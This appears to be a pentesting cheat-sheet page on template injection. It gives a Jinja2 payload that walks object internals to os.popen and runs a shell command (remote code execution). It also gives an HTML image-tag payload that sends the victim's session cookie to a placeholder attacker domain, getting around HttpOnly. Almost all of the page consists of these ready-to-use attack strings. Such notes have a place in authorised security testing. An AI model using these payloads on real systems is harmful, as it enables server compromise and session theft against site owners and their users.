Template Injection Table of Contents RCE Client-Side Protection Bypass RCE Arbitrary commands can be executed remotely. RCE {{ self._TemplateReference__context.config.__class__.__init__.__globals__['os'].popen('whoami').read() }} Client-Side Protection Bypass Client-side protections can be bypassed. Bypassing HttpOnly and Exfiltrating Session Cookie Value <img src=https://[ATTACKER-DOMAIN]/?cookie={{request.cookies.session}}>